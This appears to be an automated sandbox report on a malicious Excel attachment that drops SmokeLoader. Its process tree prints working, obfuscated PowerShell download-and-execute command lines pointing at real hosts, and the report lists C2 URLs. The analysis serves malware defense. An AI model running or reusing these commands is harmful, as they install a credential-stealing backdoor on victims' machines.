Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U3010TW-S PO#U3011PO#3311-20241118003.xls

Overview

General Information

Sample name:#U3010TW-S PO#U3011PO#3311-20241118003.xls
renamed because original name is a hash value
Original sample name:TW-S POPO#3311-20241118003.xls
Analysis ID:1557899
MD5:6a9f4cbac228885c734793d88b691d2f
SHA1:e4afd16d467570807b14a28df304ef8f538cf30c
SHA256:92322c09584ce34faa099794f8a9aa425e7dc08ea803a4f3ff28be197418d8ed
Tags:xlsuser-abuse_ch
Infos:

Detection

HTMLPhisher, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3224 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3544 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3648 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3860 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 4012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 1932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
              • aspnet_compiler.exe (PID: 3948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
                • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                  • explorer.exe (PID: 3756 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                  • explorer.exe (PID: 3656 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                  • explorer.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                  • explorer.exe (PID: 816 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                  • explorer.exe (PID: 2068 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                  • explorer.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                  • explorer.exe (PID: 2244 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                  • explorer.exe (PID: 2108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                  • explorer.exe (PID: 2580 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • AcroRd32.exe (PID: 4060 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • mshta.exe (PID: 1264 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1432 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3532 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 2916 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 3964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • taskeng.exe (PID: 4052 cmdline: taskeng.exe {D690A31F-6F9A-4F5C-9D7D-F0EC28BCB101} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • vtjrhji (PID: 3728 cmdline: C:\Users\user\AppData\Roaming\vtjrhji MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
